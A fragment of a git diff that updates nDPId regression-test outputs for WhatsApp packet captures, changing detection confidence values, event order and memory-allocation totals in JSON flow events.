-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116217773,"flow_last_seen":1655116218131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108977493,"flow_last_seen":1655108978075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655109656108,"flow_last_seen":1655109656661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655111789393,"flow_last_seen":1655111789765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111268965,"flow_last_seen":1655111269503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655110961423,"flow_last_seen":1655110962551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980061,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116940904,"flow_last_seen":1655116941291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111826253,"flow_last_seen":1655111826511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655113084330,"flow_last_seen":1655113084909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116940904,"flow_last_seen":1655116941004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116941004,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655114622076,"flow_last_seen":1655114622275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116217773,"flow_last_seen":1655116218131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108977493,"flow_last_seen":1655108978075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655109656108,"flow_last_seen":1655109656661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655111789393,"flow_last_seen":1655111789765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111268965,"flow_last_seen":1655111269503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655110961423,"flow_last_seen":1655110962551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980061,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116940904,"flow_last_seen":1655116941291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111826253,"flow_last_seen":1655111826511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655113084330,"flow_last_seen":1655113084909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":679,"packets-processed":679,"total-skipped-flows":0,"total-l4-payload-len":50635,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":86,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":86,"total-idle-flows":86,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":579,"global_ts_msec":1655116941291} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 679/679 @@ -585,9 +585,9 @@ ~~ total active/idle flows...: 86/86 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6155362 bytes -~~ total memory freed........: 6155362 bytes -~~ total allocations/frees...: 119219/119219 +~~ total memory allocated....: 6288996 bytes +~~ total memory freed........: 6288996 bytes +~~ total allocations/frees...: 121981/121981 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 693 chars diff --git a/test/results/whatsapp_login_call.pcap.out b/test/results/whatsapp_login_call.pcap.out index 78dffb897..76b7abb3b 100644 --- a/test/results/whatsapp_login_call.pcap.out +++ b/test/results/whatsapp_login_call.pcap.out 
@@ -3,7 +3,7 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582222253,"flow_last_seen":1432582222253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582222253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582222253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222253,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0DNdAAEAG9U7AqAIEEaxkRsAvA+GIPSCcUlOPyIAQH\/poTQAAAQEICi36Gt0QlQ1l"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1432582222267,"pkt":"xiwDYGpkAPS5Jrv0CABFAADeU1tAAEAGriDAqAIEEaxkRsAvA+GIPSCcUlOPyIAYIAB\/kgAAAQEICi36GusQlQ1lFwMBACCNqYpymgjJuQNgLA+QJekfsmHWqykdlwnJ8t48lRIpCxcDAQCAv+6eyOO6KHhFdGRnKCRyPqihrwnYLrpV5EXpUrXv8Q2ow7fiZ\/ErfHE9ZAprbeZEb1cjDczzZ9GWtg7wUDK1rjYT+gKbhCMZiNQZ3QlWly2tQPPw5M7rqWdzOWy2ATMXqxCkXOBCTdOBYD70ikDCSIjo2fZ8\/cJDhiGvSnc\/9Rw="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582222253,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":1,"thread_ts_msec":1432582222267,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582222253,"flow_last_seen":1432582222267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":1,"thread_ts_msec":1432582222267,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432582222410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222410,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0e5UAAC8G15ARrGRGwKgCBAPhwC9SU4\/IiD0hRoAQAJuGIAAAAQEIChCVDjkt+hrr"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223075,"flow_last_seen":1432582223075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223075,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582223075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223075,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoimtAAEAGmaXAqAIEEZpCecAOAbvaSAv6foHOKFARQABkXQAA"} 
@@ -24,7 +24,7 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582224238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224238,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0pWwAADkGNJ9duodSwKgCBABQwBXhXSkWroZu\/IARAeZAKgAAAQEIClj4+ywt+iJ3"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432582224240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224240,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA06DdAAEAGqtPAqAIEXbqHUsAVAFCuhm784V0pF4AQIEUhrwAAAQEICi36IpNY+Pss"} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1432582224258,"pkt":"APS5Jrv0xiwDYGpkCABFAACJJDcAADkG7nUXMpTkwKgCBAG7wBTRmfKoS8+iLoAYAghwjQAAAQEIChFecist+iKKFQMDAFAv7dNuXnOpK1CdvNYEt52MdeH58dywqIMfN+GfFSQKoHdGcEPHPIYnDd6I8bRCtU0lSoikjPCdTCArNmgRywMWXqpqGQcfgITTy3erXmajWw=="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582224230,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":42,"midstream":1,"thread_ts_msec":1432582224258,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582224230,"flow_last_seen":1432582224258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":42,"midstream":1,"thread_ts_msec":1432582224258,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582224259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224259,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JDgAADkG7skXMpTkwKgCBAG7wBTRmfL9S8+iLoARAgi9fgAAAQEIChFecist+iKK"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432582224263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224263,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UnIAADkGPNoFsioawKgCBABQwBZ503WfeS7N5oARAeY3ugAAAQEICmSSnpkt+iKP"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224264,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0QQVAAEAGB0fAqAIEBbIqGsAWAFB5Ls3medN1oIAQIFAZNgAAAQEICi36Iqlkkp6Z"} 